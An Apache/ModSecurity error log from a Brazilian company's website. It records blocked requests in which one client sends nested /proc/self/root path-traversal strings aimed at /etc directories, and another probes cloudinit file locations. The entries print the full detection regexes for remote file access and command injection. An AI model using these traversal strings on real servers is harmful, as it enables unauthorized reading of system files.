https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 13:46:31.879439 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:40048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrW5-oXxyEfFpUF8f-NzQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:46:41.833880 2026] [mime_magic:error] [pid 30077:tid 140411666392832] (70014)End of file found: [client 57.141.18.13:57962] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:47:45.948519 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:35540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrXMcdf6f5d65gmYZTz6QAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:47:53.281947 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:33286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrXOeoXxyEfFpUF8f-OHAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:49:13.650863 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.244.43:37416] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrXiQbLMZ6AikZjR9XeyQAAABM"]
[Wed Mar 18 13:49:17.128040 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.228.61:37752] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrXjew_le52K8_3pV38vAAAAhM"]
[Wed Mar 18 13:49:32.043630 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:33294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrXnEzinOy1jxa1j4c3IwAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:49:36.783295 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:44700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrXoPu8EFLIOrSqIpshkAAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:50:44.182426 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:50372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrX5Na6ubjKNq_cu4a9xQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:51:07.930993 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:34496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrX--oXxyEfFpUF8f-O9gAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:51:59.679958 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 57.141.18.85:38834] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:53:35.174140 2026] [mime_magic:error] [pid 15051:tid 140411599251200] (70014)End of file found: [client 57.141.18.80:42970] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:53:52.431568 2026] [:error] [pid 17653:tid 140411548894976] [client 216.73.216.191:42585] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYoMdf6f5d65gmYZT1IwAAAtc"]
[Wed Mar 18 13:53:52.431675 2026] [:error] [pid 17653:tid 140411548894976] [client 216.73.216.191:42585] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYoMdf6f5d65gmYZT1IwAAAtc"]
[Wed Mar 18 13:53:54.703537 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:45864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYouoXxyEfFpUF8f-P2AAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:53:58.537505 2026] [:error] [pid 17887:tid 140411658000128] [client 216.73.216.191:4268] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYpQkwaGbbGflqUZAwiQAAAMo"]
[Wed Mar 18 13:53:58.537606 2026] [:error] [pid 17887:tid 140411658000128] [client 216.73.216.191:4268] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYpQkwaGbbGflqUZAwiQAAAMo"]
[Wed Mar 18 13:54:06.745944 2026] [:error] [pid 29882:tid 140411632822016] [client 216.73.216.191:39391] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYrkzinOy1jxa1j4c37gAAAQ0"]
[Wed Mar 18 13:54:06.746024 2026] [:error] [pid 29882:tid 140411632822016] [client 216.73.216.191:39391] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYrkzinOy1jxa1j4c37gAAAQ0"]
[Wed Mar 18 13:54:10.024845 2026] [:error] [pid 31803:tid 140411582465792] [client 216.73.216.191:57588] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/cloud_id.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYsuyqAr6etmhZHNrnTwAAAFM"]
[Wed Mar 18 13:54:10.024920 2026] [:error] [pid 31803:tid 140411582465792] [client 216.73.216.191:57588] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/cloud_id.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYsuyqAr6etmhZHNrnTwAAAFM"]
[Wed Mar 18 13:54:25.621234 2026] [mime_magic:error] [pid 15826:tid 140411607643904] (70014)End of file found: [client 57.141.18.2:45446] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:54:27.483390 2026] [:error] [pid 17653:tid 140411582465792] [client 216.73.216.191:63404] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/clean.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYw8df6f5d65gmYZT1VwAAAtM"]
[Wed Mar 18 13:54:27.483500 2026] [:error] [pid 17653:tid 140411582465792] [client 216.73.216.191:63404] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/clean.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYw8df6f5d65gmYZT1VwAAAtM"]
[Wed Mar 18 13:54:38.148506 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:46220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYzgkwaGbbGflqUZAwtAAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:54:39.111229 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:51359] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/clean.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYz9a6ubjKNq_cu4a-dwAAA0w"]
[Wed Mar 18 13:54:39.111321 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:51359] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //usr/lib/python2.7/site-packages/cloudinit/cmd/clean.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrYz9a6ubjKNq_cu4a-dwAAA0w"]
